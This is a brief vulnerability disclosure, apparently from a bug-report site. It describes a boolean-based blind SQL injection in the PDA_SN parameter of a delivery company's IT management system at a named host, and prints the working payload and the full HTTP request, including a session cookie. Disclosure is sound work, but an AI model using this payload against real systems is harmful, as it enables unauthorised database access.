SQL injection vulnerability in express it Management System
Place: POSTParameter: PDA_SN Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: PDA_Type=&PDA_SN=X30013040448' AND 1496=1496 AND 'MmCo'='MmCo&pager.pageNo=1&pager.pageSize=20&sort=USE_SITE&direction=desc
POST /BaQiangWangDian/getBaQiangOfPager HTTP/1.1Host: it.zt-express.comProxy-Connection: keep-aliveContent-Length: 91Accept: application/json, text/javascript, */*; q=0.01Origin: http://it.zt-express.comX-Requested-With: XMLHttpRequestUser-Agent: Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://it.zt-express.com/Views/BaQiang/BaQiangWangDian.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: ASP.NET_SessionId=o0rlyixrhhpc4z1q5cbjgu1bPDA_Type=&PDA_SN=X30013040448&pager.pageNo=1&pager.pageSize=20&sort=USE_SITE&direction=desc
Injection parameter: PDA_SN
Slow data running
Solution:
SQL Filter